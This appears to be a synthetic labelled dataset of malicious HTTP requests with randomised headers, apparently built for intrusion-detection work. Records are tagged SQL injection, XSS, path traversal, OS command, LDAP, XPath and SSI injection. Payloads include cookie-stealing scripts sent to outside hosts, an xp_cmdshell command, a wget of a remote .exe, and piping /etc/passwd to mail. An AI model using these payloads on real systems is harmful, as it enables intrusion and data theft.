Accept-Encoding: <div style   = "  background-image:    url(javascript:   [document.location.replace   ('http://www.sileel.com/cgi-bin/la.cgi'+document.cookie);]);"  >
Accept-Language: t-rkdshf1;q=0.1, hahat-lagvsei, nsh-p
Cache-Control: no-store
Client-ip: 83.13.216.219
Cookie: Aa0hr= t2;gCfromG=so2n6plesth;td=evz;loc4bmndivce=gilhhuKtpann7otsft;hru2paSdnhrnleu=hto7IsfO9Iy
Cookie2: $Version="0"
Date: Sat, 12 Nov 05 11:43:42 UTC
ETag: W/"8Su7pNQCkfhfoAvcE"
Expect: 100-continue
From: eoshsh@qisp7eg.org
If-Modified-Since: Tue, 06 May 08 16:03:16 GMT
If-Unmodified-Since: Tue, 03 Nov 09 20:23:31 CET
If-Match: "D1nzZ0219KnRkvNi518t"
If-None-Match: *
If-Range: Fri, 06 May 05 03:43:51 CET
Max-Forwards: 93
MIME-Version: 1.9
Pragma: ica=oeicS4
Proxy-Authorization: so7n seEgteed=c5edme
Authorization: Basic YWhpUnl2aTplb3dB
Range: -2,441595-
Referer: /tenai/onDu.dll
TE: chunked;q=0.2,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: teeer7ct/4.6.1
UA-CPU: Sparc
UA-Disp: 1938,517,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 991x9240
Via: 7.6 166.187.3.255, 2.0 83.95.171.243, h3E/3.5 201.201.141.93:2082
Transfer-Encoding: deflate
Upgrade: Sclxk9/4.9, M9s8r/4.0, 1pr/8.7, eh6/3.6, stmem/0.6
Warning: 814 www.hsOonn.js "iker" "Fri, 28 Jul 06 12:52:58 CET"
X-Forwarded-For: 146.70.16.14
X-Serial-Number: 015353495234
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46594
Start - Id: 35057
class: SqlInjection
GET /tgbZZgvk3590cpd5Z/eiUyR_D-JaO_-R/emEnH7seaagycN0w/mB/ntAdotae.asp?cmrjC=mV%40Q8&1eoypa9=8138428&wrbI-@tqGO=exec+xp_cmdshell++%27bcp++%22select+++++*++++from+++++eoijaruth%22++queryout+pwdump.exe++++-c+++++-Craw++-Shackersip+++-Usa++++-Ph8ck3r%27&IallVT.stdin_http=1sTosrh&uirnesyi=aqAnv7&mailEM6nDsOP=4d&ua=n1f7F6 HTTP/1.1
Host: 125.49.47.87
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255, euc-jp;q=0.1, windows-874;q=0.9, windows-1257
Accept-Encoding: 
Accept-Language: ddu-n1leoey
Cache-Control: no-cache
Client-ip: 243.80.185.17
Cookie: uetxsnt=8MY
Cookie2: $Version="16"
Date: Wed, 19 Dec 07 15:47:55 UTC
ETag: "WafdUY6zudi3PdKk7Olr"
Expect: 4en1t=spype;iksuo0L=mtJuin
If-Modified-Since: Fri, 19 Jun 09 09:30:24 GMT
If-Unmodified-Since: Fri, 06 Feb 04 14:31:53 UTC
If-Match: "9ZYLA89ve9xKQ.Kx"
If-None-Match: *
If-Range: Thu, 16 Nov 06 05:57:12 UTC
Max-Forwards: 8726
MIME-Version: 0.3
Pragma: xiaiiz6=ttr02u
Proxy-Authorization: Basic aFJpQzpidHN1bw==
Authorization: Digest username="rtnn"
Range: -4,7-,2698-
Referer: /43oic/r1reayll/uasheh/koel2s/6r6aeaof.jsp
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: C2trli (a-V5flhW6; oKU8lHvz-p; lFFOfY; bRGU@y@)
UA-CPU: x86
UA-OS: Windows NT
UA-Color: color16
Via: HTTP/2.6 www.lbtfe.js:08
Transfer-Encoding: deflate
Upgrade: l5i/1.7, lDqw/9.3, ade/1.3, rst/9.9
Warning: 825 www.eezs.png:4813 "dnlyiz8ddawi9eucren" 
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35057
Start - Id: 45332
class: PathTransversal
GET /1nHteseseh6/CT3E/6iol0Noip7EEniGumot/yVPGsHAoyoNS7PIpI1w/olSIm/iUgNj.css?seksoesacnhseoh=NnmiispSmo0&euhrgts=821177&bolctboydV=0315&@B3metahxIoZ=4901584&reiles=eo9kjsdhiI4Ta&g1b=689&g9h=asx2+yincludebH&rWfaoT=aunion%2485aiframeQnhd%7C&0ar=979&N0IQaK=16870 HTTP/1.1
Host: www.iya3.be:80
Connection: close
Accept: */*
Accept-Charset: x-mac-ce;q=0.8, iso-8859-7, gb2312;q=0.1, gb2312
Accept-Encoding: 
Accept-Language: 53-tof4tlif, twuk8-nua6Re;q=0.3, so-s, endrFv-hnN;q=0.2
Cookie: d0ynho54froE=0222337;ouixdtisit=t:\autoexec.bat;a8=qscriptHbrwltin
Date: Thu, 07 Jan 10 03:50:55 UTC
Max-Forwards: 3
Pragma: smnsb='iM'
Range: 73-4
Referer: http://www.u5roer.ch/Lhelss/2i9OiUm.mdb
User-Agent: ajKfnGn/5.8.4.0.2
Via: FTP/3.8 www.bet4m.css:2165, HTTP/5.9 251.100.179.9:02874

null

End - Id: 45332
Start - Id: 42353
class: SqlInjection
GET /yQ_ONJpBe2H4hY52F./uz@doFhPQwiF.php?aaehtfb=+&trLteci3fAena=++++OR++++2+%3E+++++1 HTTP/1.0
Host: 149.153.216.111
Connection: close
Accept: video/*, video/*, application/postscript
Accept-Charset: euc-cn;q=0.4, windows-1254;q=0.2, iso-8859-15;q=0.5, x-mac-turkish;q=0.7, windows-1253;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: oTt='liserg8'
Client-ip: 167.183.199.0
Cookie: Iol=1W24U_abq-q4;m8a=iTQxbYUmQup;Lace=921667
Cookie2: $Version="89"
Date: Mon, 21 Apr 08 16:22:33 GMT
ETag: "Jzw07-CaqNHQ-4c"
Expect: ieiqg
From: ttyr@nt7thnt6um.uk
If-Modified-Since: Thu, 19 Apr 07 23:00:35 UTC
If-Unmodified-Since: Fri, 18 Jun 04 09:17:23 UTC
If-Match: "8lnhVBDG@FSbnnEvcgb"
If-None-Match: "f-1U4MQ5PQ4AqgK"
If-Range: Wed, 21 Feb 07 16:25:05 CET
Max-Forwards: 5149
MIME-Version: 6.6
Pragma: nllcigJd=tehts9t
Proxy-Authorization: NTLM dWVtZjVhZVpub2RucmxwaW1ib2luaGlub29hU3RwYTE=
Authorization: NTLM c3V0aWFFbXpsN1lmZHJ0ZW91dm5ldHR1YXgycnJjYXI3c3JzeGNycnVydG43
Range: -966,396-333,-3990
Referer: http://www.nt2tss5w.st/ooica1.rar
TE: gzip,trailers
Trailer: Proxy-Authorization
User-Agent: tsi0g/0.3
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 999x243
Via: 6.5 www.srTHo.jpeg
Transfer-Encoding: identity
Upgrade: aia9y/5.8, shfr/4.4, ssoa/6.4
Warning: 408 www.eaxt.js "r7iatenLagSol" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42353
Start - Id: 46732
class: XSS
GET /oisi/1PkFac9c/BlO/yADspe.bin?machildHxE=mstdinedqG&Idaobttnos=rJL4jG&aIdsStirrwft=504464967&isse=objf1&mae2xfioeymF=7&zolnoti2er=jKj4K.xdNEs0&jy-Aprocessing-instructionyFEUJ=dba3&dy9gTzeyyl34=s%40e%5Beeainl1orrocopynr%5Da HTTP/1.1
Host: www.ekhd.st
Connection: keep-alive
Accept: audio/*
Accept-Charset: koi8-r, x-mac-roman;q=0.7, iso-8859-2, x-mac-icelandic
Accept-Encoding: *
Accept-Language: a-44Lhet, rtcatbTe-a1, e-Cijrlu, ridk5tti-nlz1u, striiet-wh5mx;q=0.0
Cache-Control: ch=ese7tsce
Client-ip: 201.132.62.40
Cookie: 7em0zYrMafes=tu;qh2yetxMstnok32=<div  style = " background-image:     url(javascript:   [document.location.replace('http://www.metoil.com/cgi-bin/aslindnill.cgi'+document.cookie);]);    "  >;mmrCrroYlutt=oswt
Cookie2: $Version="8"
Date: Mon, 28 Mar 05 10:26:33 GMT
ETag: W/"6iD2Nmxi5v5ABb1tw"
Expect: 100-continue
From: Bnp1da@sliesdid.be
If-Modified-Since: Tue, 09 Jun 09 06:37:22 GMT
If-Unmodified-Since: Wed, 26 Aug 09 23:36:31 UTC
If-Match: *
If-None-Match: "Opry@I7.-3UISGO3vYox"
If-Range: *
Max-Forwards: 9155
MIME-Version: 6.3
Pragma: o='saheng'
Proxy-Authorization: dNtwcd 6dptZm=tetko
Authorization: ojp6r uswliesi=uezLxoo
Range: -01,1051-
Referer: /yn9lui7/ameow/rMicI/qa3Etef.png
TE: trailers,trailers,gzip
Trailer: If-Match
User-Agent: bcdnwqtdterAbdne
UA-OS: Win98
UA-Color: color32
UA-Pixels: 318x240
Via: 7.6 www.xrQyh1t.htm, FTP/6.3 201.120.87.115, 6.1 www.rT2tn.jpeg
Transfer-Encoding: gzip
Upgrade: iMc/5.2, eehrbu/8.7, eliete/0.1
X-Serial-Number: 293931197401381
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46732
Start - Id: 46633
class: XSS
GET /lqk.H4JAMTxa/XcopyNN/0IRQITvYBUR/euie/S4iEr9felehqai/aItvsBNf9xbFc3/ydxdt/r4WLi-RO49epW9d.png? HTTP/1.1
Host: www.tgStn.com:4102
Connection: close
Accept: audio/*;q=0.3, video/mpeg;q=0.5, image/*
Accept-Charset: *;q=0.9
Accept-Encoding: compress, identity;q=0.9, identity
Accept-Language: <div style    =    "binding:     url([http://www.al.com/script/ohtsIh.php4]); "    >
Cache-Control: no-transform
Client-ip: 219.150.217.95
Cookie: dect=rVMYTz;j1home7v4MmVtB=sf0h;ueiiTFcrOe=window.opentbin;hd=)ucopytt;cre=78708;l9hkkovrip=e6c e  -
Cookie2: $Version="5"
Date: Tue, 05 Jan 10 09:01:18 UTC
ETag: "14UmgyVJx4Sug6vrUA4w"
Expect: vetise=ab4eliOb
From: iuaea@cvOyle.it
If-Modified-Since: Mon, 12 Dec 05 02:31:07 UTC
If-Unmodified-Since: Wed, 13 Aug 08 08:17:41 CET
If-Match: "M0KTntvSZvaBZXcEf_Kw"
If-None-Match: *
If-Range: *
Max-Forwards: 6540
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM c2hkbDNhbmRhMGVJbGluUmN3MW9zM2VlbFdleHFpZWhBbmFzaURmOW1tZG8xeg==
Authorization: Basic bnJ0bjpndEVmb24=
Range: 516737-,3-
Referer: http://bahfzE.fr/bm8vix/tiressp.php3
TE: trailers,chunked,deflate;q=0.0
Trailer: Via
User-Agent: Mozilla/5.0 (Machintosh; U; PPC Mac OS X 6.6; tg-st; rv:3.6.5) Gecko/03175104
UA-Pixels: 488x452
Via: 6.5 www.efei9art.tiff
Transfer-Encoding: identity
Upgrade: Ecza/9.5
X-Serial-Number: 4075489
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46633
Start - Id: 45929
class: PathTransversal
GET /hhG1kvtaehjtmrdne/dy@ypks3p-5uAsC7C.asp?RHIY=ory%3Df&ino=%3Es&ztl=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat&engeuatE8oAsfe=hnne3eZg8&xSbfedeeO=8340312&seeN3tusOotht=9&LawR=3201009062&.OzI1y=7582&rmtyoiro=aNrshs&QJpnmlnetcatocV=lnaae%3Apasswd%24r%3Ciln&imenea3os=981 HTTP/1.0
Host: 240.102.176.100
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=32117
Client-ip: 114.234.233.242
Cookie: 2cgn2n=gEcbe0ezttyh;taSvnDrfolSle=9sehC;Iuo=t;an7rns7natA=<;DnB0=t.IwnD8
Cookie2: $Version="256"
Date: Wed, 21 Dec 05 10:48:58 UTC
ETag: "1dUIeGRJtA9ksMvBNQ8"
Expect: 100-continue
From: leat@aeegln9ow.cz
If-Modified-Since: Sun, 09 May 04 12:02:03 CET
If-Unmodified-Since: Wed, 09 Aug 06 24:48:18 UTC
If-Match: *
If-None-Match: *
If-Range: "jJ6T6htMl87VPDy-q4ed"
Max-Forwards: 3
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest nc=8bfbc834
Authorization: Digest username="qeeAe0NT"
Range: -542428,64054-7678
Referer: /4elhy/2elnd/hinnsDB7.html
TE: deflate;q=0.6,trailers
Trailer: Upgrade
User-Agent: Mozilla/6.8 (Machintosh; U; PPC 3.8; xr-uE; rv:7.3.3) Gecko/11454996
UA-CPU: Sparc
UA-Disp: 1794,840,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 880x5284
Via: 0as2/0.1 www.aiNdeitw.jpeg, ipin/7.6 236.140.77.240:02, 8.8 www.dNdbb6ir.shtml
Transfer-Encoding: deflate
Upgrade: kEto/7.4, dhyart/8.2, atafl/0.4, yoir/6.2
Warning: 025 97.241.122.220:45 "riSehsrtuatehr" 
X-Forwarded-For: 210.181.84.191
X-Serial-Number: 7013359045213548457
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45929
Start - Id: 42942
class: OsCommanding
GET /9hn2fdypoe/leBdMMA5N6W/vojs/aG.gif? HTTP/1.0
Host: 134.234.8.60:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: x-mac-turkish
Accept-Encoding: \n     wget     http://94.111.91.198:710/nftp.exe
Accept-Language: *
Cache-Control: olN3xsih='e'
Client-ip: 117.172.196.9
Cookie: rs_gNydC0C=dgnnnco;AQ4.3rYtmpoo=ti1ls;v0tWXI5q-=k
Cookie2: $Version="9"
Date: Thu, 14 May 09 19:04:42 CET
ETag: W/"pkDDerwI.sGRtxxDF"
Expect: 100-continue
From: 3aheja@ties8On.biz
If-Modified-Since: Tue, 21 Aug 07 07:43:54 CET
If-Unmodified-Since: Wed, 07 Jan 04 22:18:59 UTC
If-Match: *
If-None-Match: "rf5ECoaXOoU2CsaYS11Y"
If-Range: "ulxe3b@Z3FExb5.V.L_"
Max-Forwards: 69
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ihsrran"
Authorization: atago sztecibe=ef5eo3e
Range: 01418-88080,370072-
Referer: /attqtge/utno/er0aonw.swf
TE: deflate
Trailer: Referer
User-Agent: Mozilla/5.7 (compatible; Konqueror/5.7; Linux i586; eaei; 2agxowithz)
UA-CPU: PowerPC
UA-Disp: 273,697,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 512x475
Via: HTTP/1.2 211.82.97.82
Transfer-Encoding: identity
Upgrade: rts/3.1, eacx/4.9, rit/1.5, Wj7c/1.4
Warning: 513 www.cgtoaN.jpg "orin5gbEs" 
----: ------------------------------------------------

null

End - Id: 42942
Start - Id: 37267
class: LdapInjection
GET /beeaeZafoIs/rkqperlfCQ7autoexecKVnodercp/Qv8I.mdb?Fdoc=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&9AJBR=froiegrv3lEa HTTP/1.0
Host: 244.56.94.182
Connection: close
Accept: text/*, audio/*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Client-ip: 99.144.142.168
Cookie: YFg.D=u9I;JWIC8zxe9=teeey;slxNeh5i=23107074;tmieNestflrqm=swieny5oylytdsr;ezaeEcraZEiB=eevtnR&;foFumesidlnao=\nsppxmf
Cookie2: $Version="44"
Date: Wed, 19 Jul 06 10:29:37 GMT
If-Modified-Since: Tue, 09 Jun 09 04:37:04 CET
If-Range: *
Max-Forwards: 3487
Pragma: tqr=l
Proxy-Authorization: Basic dG9hc3RuOnNodnNocg==
Referer: http://aet2W.be/eesq/nathl/7nrgogsA.php
User-Agent: elaemfinp (r4akHR-Wda; id3NnilPkG; z8G19C8M9f; aUVWZXTx; 1UmlN74O)

null

End - Id: 37267
Start - Id: 35672
class: XPathInjection
GET /vMdstmeUesewnxliorbA/UL1UMLchild.window.openPrmi/ea/aiT30Fve/dyuNIHDWVW_kPIh5/hts04pimawar/qYby47l2iFV/soAealapvmtrNejne1/ahvr1a/0dushoOnr2.cfm?s_dfPUm81=g5U%27+or+++%28i++++%3C++++count%28eoyru%2Fchild%3A%3Atext%28%29%29+and++++j++%3C+count%28leel6%2Fchild%3A%3Acomment%28%29%29+and+++k+++++%3C++count%28ire%2Fchild%3A%3A*%29++++%29++or+++%27cttUta%27+++%3D++%27+++++o0%27++++or HTTP/1.1
Host: 53.126.37.192:80
Connection: close
Accept: */*
Accept-Charset: big5
Accept-Encoding: *;q=0.0
Accept-Language: hTtosnir-w, dc-ie7he, 8Wc98qs-d;q=0.0
Cache-Control: no-cache
Client-ip: 68.97.141.43
Cookie: ah98=43;IyEFn=as
Cookie2: $Version="890"
Date: Sun, 08 Apr 07 16:41:43 UTC
ETag: "Llo6Q0Dtf73F-LBFZWsG"
Expect: e8c6tipe
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Thu, 08 Oct 09 16:38:14 UTC
If-Unmodified-Since: Mon, 27 Apr 09 16:38:08 GMT
If-Match: "-OtePnzfOtfkoju"
If-None-Match: *
If-Range: "1947u5Zn0GiwsfB"
Max-Forwards: 0084
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest username="sudmt"
Authorization: Basic YWUwcjpIdE5tZTl5
Range: -5103
Referer: /faieie/nhlldMr.html
TE: chunked,trailers,deflate;q=0.4
Trailer: From
User-Agent: Mozilla/4.4 (Windows; U; Windows NT 9.0; hm-it; rv:2.3.4) Gecko/64249877
UA-CPU: x86
UA-Disp: 466,505,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 2667x788
Via: 8.1 188.92.150.124, 2.5 81.54.134.140
Transfer-Encoding: compress
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 250 95.244.16.100 "anwrZ" 
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 24734
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35672
Start - Id: 40634
class: SSI
GET /zXGa.9-5RfromoXlocationwget/nrbDtrmlne/se/ei/hps-/gnWpsiseeLx2ornao3rh/4noKjocNX5Blc5naqq/nwnlwsotarxgnuIeS/kmaw6/terH1E5lzwD27ZimgRwf/ywezdSHtiDtayoid8.cfm?ih=atDUJ8&1pord=eHif6X&aotlk4odp8yla1=awreat%3Bt3opsnau%3E&G3rQ1hAl5=27567480&eH=admin7Vstts8d0utsro%26&jIiiG=pqEee&aeitiebhKsd=eservicespb+hdn%24sfperltntwh&jl=esetaeeio&tihhcanh=anC&4andtqeeVsM=21&gd=e817k&hSC1c=%3C%21--%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++++--%3E&WIboot.inih=0&tW2voh9ki=078&twtaesean=h HTTP/1.1
Host: 142.109.57.196
Connection: QgMj
Accept: video/quicktime
Accept-Charset: iso-8859-4, iso-8859-6, iso-8859-1;q=0.3, iso-8859-6, ks_c_5601-1987
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.2
Cache-Control: max-age=1
Client-ip: 90.139.110.154
Cookie: onAnmiR=l7jNzjqc7
Cookie2: $Version="00"
Date: Fri, 06 Aug 04 21:54:54 GMT
ETag: "mcIwQFyln8H.QXt5B"
Expect: 100-continue
From: tzt2Rh@qI5nosnls.cz
If-Modified-Since: Tue, 07 Jul 09 20:53:10 CET
If-Unmodified-Since: Mon, 01 Mar 10 12:01:38 UTC
If-Match: "1Gj4TWa1@Ts-kXp7j"
If-None-Match: "Y_DawOze9QOPFzXa"
If-Range: "lXyBqmAI8Diln-23NTX"
Max-Forwards: 2
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: ctauis uahpegS=thr2
Authorization: NTLM cmZvYXBmcmE4Y3dhcGhpbmlyamJFb3RzcmFhbjlsbGlTbXA=
Range: -916,268-761609,54-38396
Referer: /ea4alo/8ooY/iesnrcl.wmn
TE: gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.0 (Machintosh; U; PPC Mac OS X 2.0; go-mo; rv:0.9.0) Gecko/33575777
UA-CPU: Sparc
UA-Disp: 959,926,32
UA-OS: Windows 95
UA-Color: color16
Via: afeire/7.6 www.nGNm.png:7, FTP/7.6 www.batot.gif, 3.2 www.ndsreo.shtml
Transfer-Encoding: compress
Upgrade: 3ri/5.3, 3tr/9.3, daeuf/7.9, h2tiee/5.4, i6epn/2.5
Warning: 723 www.Uxehyne.html "ycdtssattZee" 
X-Forwarded-For: 197.32.78.234
X-Serial-Number: 9481598521
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40634
Start - Id: 39626
class: SSI
GET /aSO5Z.nsf?saeEho6dlrp2=%3C%21--+%23include++++virtual%3D%22%2Fetc%2Fpasswd%22--%3E&topntsLwrtLuef=ntgll3Uiaise&cT.UfSuGe=80568563&echoBLtEchildSformL2K9=61 HTTP/1.0
Host: 214.112.243.21
Connection: keep-alive
Accept: image/*, audio/basic;q=0.6
Accept-Charset: windows-1258, windows-1254
Accept-Encoding: compress;q=0.2, deflate, gzip;q=0.7, compress;q=0.1, identity;q=0.5
Accept-Language: eLptg-c1zdilt;q=0.6, eprm-lioUf, aoysDesr-rige;q=0.1, azl-peomtlry;q=0.2
Cache-Control: only-if-cached
Client-ip: 79.170.36.207
Cookie: 6A@Is5gYVvari0=dx@WsS6VeE;0a4lZzGk=gaDo;OlSNobjectd=17320431;avl=oa<7;toata=ens a]jiscripthHporewiafdocument
Cookie2: $Version="78"
Date: Mon, 26 Sep 05 21:32:31 CET
ETag: "JNM4muUx1V.zdKmp.HOl"
Expect: eninei
From: nneTpp@ds2o4khd.org
If-Modified-Since: Thu, 26 Aug 04 04:39:40 CET
If-Unmodified-Since: Wed, 06 Aug 08 05:59:41 UTC
If-Match: "m.DST8zmVmUW-Zbivvl"
If-None-Match: *
If-Range: "1tBDwK1AmirrXI9L"
Max-Forwards: 1
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest nc=2CEcd91a
Authorization: eaiie 8oiF=aChthh
Range: 973-,-4,32221-
Referer: http://sHHml1r.gov/atlinlk/nnxef/anosp/ekde9ad.nsf
TE: trailers,gzip
Trailer: Accept-Language
User-Agent: Mozilla/2.0 (Windows; U; Win 9x 9.5; r9-Ee; rv:0.1.0) Gecko/46835022
UA-CPU: PowerPC
UA-Disp: 0993,069,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1841x260
Via: FTP/4.6 22.244.227.174
Transfer-Encoding: s5siuc; Amsanteh=2uiWS
Upgrade: Eyls/5.9, r7a/3.5, emaet9/3.7, Got/3.4
Warning: 475 125.51.35.41 "LSrhe" 
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 661984692472
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39626
Start - Id: 37390
class: LdapInjection
GET /ioyeeeeol.gif?h5b1tIkabt=5 HTTP/1.0
Host: 240.254.222.187
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: Hgflt)(   |    (doo=*)
Accept-Language: trepft-Am
Cache-Control: no-store
Cookie: rhxuhg8se=vootae;hr3aiTatNel=tocaednfgonh
Cookie2: $Version="06"
Date: Sat, 07 Feb 04 23:08:56 UTC
ETag: "AuVb6WGQjiwPjVWU"
Expect: ron5eh
If-Modified-Since: Mon, 05 Jun 06 05:52:28 GMT
If-Unmodified-Since: Fri, 11 Mar 05 10:51:02 GMT
If-Match: *
If-None-Match: "ZrteGa33_COudmjA"
If-Range: Mon, 05 Sep 05 06:02:19 GMT
Max-Forwards: 910
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: lmrt hidHn3=naUlw
Authorization: NTLM ZVRlbHZBN2Z2aEdnd2hubmVhSHJtdkxlOGh6bmE5aHpHZHN0bXdkMm5vd0Vjemk=
Referer: http://www.daneund.biz/npn6Ys/rhbI4zh.bin
Trailer: If-None-Match
User-Agent: iicansm (l_2_1VgtFT; dq2PNdFf)
UA-CPU: 68000
UA-Pixels: 7518x4313
Via: 1.1 44.125.212.179
Transfer-Encoding: deflate
Warning: 726 www.alzEot.jpeg:23 "gqmreharuon8ber" "Wed, 20 May 09 09:50:37 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37390
Start - Id: 47357
class: XSS
GET /-.@OrmiWzN.UTp4_/h6tc.cfm?oiadpTeoytOCk=7294285&oByr=6f8lnoH&yvhm9te6iehnaA1=a&HiuaqiRmabwsse=%3Clink++++rel+%3D+%22++++stylesheet++%22++++href+++%3D+++%22+javascript%3A++%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.roor.com%2Fcgi-bin%2Ftrngetelet.cgi%27%2Bdocument.cookie%29%3B%5D+++%22%3E HTTP/1.1
Host: 105.33.33.243
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 46.13.165.123
Cookie: t2tb4O=tfss
Cookie2: $Version="10"
Date: Tue, 02 Mar 04 18:30:26 CET
ETag: W/"p3XCw3gYqj@43qfL"
Expect: 100-continue
From: hrsita@gtnEqlet.org
If-Modified-Since: Mon, 04 May 09 09:01:51 GMT
If-Unmodified-Since: Sun, 05 Jul 09 12:41:16 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 03 Mar 06 22:02:17 UTC
Max-Forwards: 033
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM ZW5sZ3NydDNhZWtuOWxtZmFhUm5pVHJvZXNlZW9hc2FsZGlkbmRuZWh6bmU=
Authorization: tzlma dsiixmto=lersh
Range: -066761,152-
Referer: http://www.tuzif.st/pl6nrstt/clat/Tait/3oeeawdt.js
TE: chunked
Trailer: Trailer
User-Agent: Mozilla/3.1 (X11; U; SunOS sun4u 0.6; ee-ex; rv:4.4.3) Gecko/85250358
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 605x5902
Via: aosw/7.7 www.sMasd.gif
Transfer-Encoding: deflate
Upgrade: ek7/9.9, ih4i/2.6, tncaf/1.8, fikd/2.8, enm/1.6
Warning: 970 233.253.83.48 "nctm" "Thu, 06 Nov 08 08:21:23 GMT"
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 0450626600564347
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47357
Start - Id: 35645
class: XPathInjection
GET /pWMs3rmn/nznBEhN.qvBvXxIhBF00/_mail/ctnfd/RWzK/D.Brcpt-/fvf6a8fi60uNggKw6Iux.aspx?r-IautoexecgC=voarca%5Cyhiie&6Eteoapcuot7=erti&lDFct=am1ska%27%5D+++++%7C+++++P+%7C+++++%2F%2Fuser%5B+++name%2Ftext%28++++%29+%3D+%27Ae HTTP/1.0
Host: www.ngnsaottE.ch
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tltl-nftke8o;q=0.1, ls2t-ofi1a6, nyzEn-ga2oamde
Cache-Control: max-age=94085
Client-ip: 26.104.226.226
Cookie: nrtfeefbeg=7ott2;0vpmohriE=hpet@;iprenerywn=trme1h;iq5i840YbtiwraI=lG_w_2g
Cookie2: $Version="640"
Date: Tue, 21 Apr 09 03:05:24 GMT
ETag: "M3ZVH_ldXyZcfC-"
Expect: linOta
From: esirPUo@ltaa.cz
If-Modified-Since: Mon, 12 Sep 05 21:13:01 CET
If-Unmodified-Since: Mon, 26 Apr 04 05:59:25 GMT
If-Match: *
If-None-Match: "jyXh9uV8U_znHt9idY"
If-Range: "zkWc-tc057oKfpcTNgq"
Max-Forwards: 4748
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: NTLM bHRscTVzaWF1eGVBcmZ3Y2xUYm5uY2Zzbndvc3NvaWZ1dHRvUmh5ZG15
Range: -38,162-85,-031
Referer: /wtctn/5aaL/sIOq/chPA/beee.jpeg
TE: trailers
Trailer: Range
User-Agent: 0YoHjzTfVJ http://www.elH5noa.fr
UA-CPU: StrongARM
UA-Disp: 458,730,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3327x2128
Via: FTP/0.5 97.30.225.2, 6.5 172.11.158.37, ensI/7.8 133.101.159.92:50980
Transfer-Encoding: identity
Upgrade: hag/9.9, hIn/5.9
Warning: 083 51.53.107.61:3990 "ittpbttTz" "Fri, 23 May 08 24:15:13 GMT"
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 587545
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35645
Start - Id: 43594
class: OsCommanding
GET /4uoGtpf7gmAT8lrs/Geob7.msf?pmWm3L4V-Gq=oops++%3B++cat++%2Fetc%2Fpasswd++%7C+mail+++your%400a.com&tzny=28217&nullIB_H=2fLDYFX7&lu=pqHsttoxra79ll&8g=aPi2X&isjdcEa=s4sock_streamt HTTP/1.0
Host: www.tnbEscbq.com:978
Connection: ofv6et
Accept: video/quicktime;q=0.2
Accept-Charset: windows-1255, iso-8859-6
Accept-Encoding: compress, compress;q=0.6
Accept-Language: m-n, yrEe6t0-Aytou;q=0.2, tpdhii-nerieet, esi6dtp2-tndtntt
